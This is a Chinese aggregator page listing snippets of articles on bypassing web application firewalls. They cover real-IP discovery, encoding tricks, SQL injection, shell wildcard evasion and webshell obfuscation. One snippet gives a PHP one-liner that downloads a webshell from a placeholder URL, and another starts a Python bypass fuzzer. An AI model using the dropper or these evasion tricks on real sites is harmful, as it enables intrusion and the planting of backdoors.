一些 bypass WAF 技巧】的更多相关文章

也是之前讲课写的,现在搬运过来 --- WAF所处的位置 * 云WAF * 硬件WAF * 软件WAF * 代码级WAF   WAF的绕过 1 架构层    1 对于云WAF,寻找真实ip        1 在子域名的ip段中找        2 信息泄漏        3 穷举ip    2 对于云WAF,利用同网段     3 WAF可能会进行两次URL解码        对输入进行两次url编码     4 编码问题 mysql默认的字符集是latin,因此在php代码里面设置的字符集为…
在渗透学习的过程中,总会遇到各种情况,例如 php 大马被 waf 拦截的时候,那么如何制作免杀 php webshell 呢,接下来就由我带各位小伙伴们一起踏上大马免杀之路,不喜勿喷. 一篇好的文章,内容可以差,目录一定要 ~~ 吹牛 ~~ 真实. 一. webshell 免杀 0x0 php 内置函数加密 小例子: 在制作免杀大马之前,我们先来看看,一个带后门的免杀 php 大马是如何制作的. 在后门网站 webshell8 下载好大马. 去掉那些混淆代码 . '' 可以看到他大概是这样的.…
从架构.资源.协议和规则4个层次研究绕过WAF的技术,助于全方位提升WAF防御能力. 绕过WAF的相关技术研究是WAF攻防研究非常重要的一部分,也是最有趣的部分,所以我在写WAF攻防时先写攻击部分.还是那句老话“不知攻焉知防”,如果连绕过WAF方法都不知道,怎么保证WAF能保护后端服务的安全.在我看来,WAF的绕过技术的研究将不断驱动防御水平提高. 以前一些WAF bypass的文章更像CASE的整理,都把焦点放在了规则对抗层面.绕过WAF规则,更像是正面对抗,属于下策.一直关注规则层面的绕过,…
PS.之前一直想把零零碎碎的知识整理下来,作为知识沉淀下来,正好借着wooyun峰会的机会将之前的流程又梳理了一遍,于是就有了下文.也希望整理的内容能给甲方工作者或则白帽子带来一些收获. 0x00 概述 随着网络安全越来越受到重视,发展越来越快.随之也出现了越来越多的安全防护的软件.例如有: 1.云waf:[阿里云盾,百度云加速,360网站卫士,加速乐等] 2.传统安全厂商的硬件waf以及一直存在的ips,ids设备:[绿盟,启明,深信服,安恒等] 3.主机防护软件如安全狗,云锁: 4.软waf…
文章是通过阅读<[独家连载]我的WafBypass之道 (SQL注入篇)>写的阅读笔记. Waf的类型 1.云waf云waf通常是CDN包含的waf,DNS在解析的时候要解析到cdn上面制定的IP上去.在请求URL的时候,数据包就会先经过云waf进行检测,如果通过的话再将数据包流给主机. 2.主机防护软件如果主机上面预先安装了这种防护软件,可用于扫描和保护主机,以及监听WEB端口的流量是否有恶意的,所以这种从功能上讲较为全面. 3.硬件IPS/IDS防护.硬件waf当向主机请求的时候,会先将流…
一.绕过命令执行: 很多WAF会限制参数字符不能为可以执行的命令,诸如ls.nc等,如果直接使用这些字符会直接被WAF拦截,但是可以通过这种的方式绕过这一限制 1.? 符号:这个符号表示条件测试,比如执行/?in/?ls,会对路径中第一个匹配到的/*in/ls进行执行,通常情况下,目录中没有这些文件,所以可以直接定位到/bin/ls,因为根目录下满足*in的目录只有bin目录 *注:可绕过OWPS CRS 2.空白字符:bash中默认没有新变量为空字符,比如$u在bash下就是空变量,这个空变量…
两个题的代码都是一样的 只是waf不一样 贴出代码 <?php function update_point($p,$point){ global $link; $q = sprintf("UPDATE users SET point=%d%s",$p,waf($point)); if(!$query = mysqli_query($link,$q)) return FALSE; return TRUE; } if(!update_point($_POST['flag'],$_PO…
tips: 利用的注射点: 支持Union 可报错 支持多行执行.可执行系统命令.可HTTP Request等额外有利条件 若非以上类型,则可能需要暴力猜解.猜解时,可能会遇到一些限制.攻击者要做的,就是将其个个击破. 1. 通过greatest函数绕过不能使用大小于符号的情况 猜解单个字符时,通常使用折半查找. mysql> select ascii(mid(user(),1,1)) < 150; +------------------------------+ | ascii(mid(us…
<?php file_put_contents('dama.php',file_get_contents('http://xxx/xx.txt'));?> php这个函数不算冷门 第一个参数是保存的文件名,如果已存在则报错停止 第二个参数是内容,可以是字符串,也可以使用file_get_contents获取一个马子内容 其实不算什么冷知识了,只是有时候一句话会被拦截,用这个会直接生成一个大马,而且本身是没有什么特征的 除非杀软直接监控的文件写入,换个加密马就行了. 可能是个人喜欢用大马吧,觉得…
从freebuf copy过来的,先保存,有空再改 #encoding=utf-8 import requests url = "http://127.0.0.1/index.php?id=1" Fuzz_a = ['/*!','*/','/**/','/','?','~','!','.','%','-','*','+','='] Fuzz_b = [''] Fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0h','%0i','%0j']…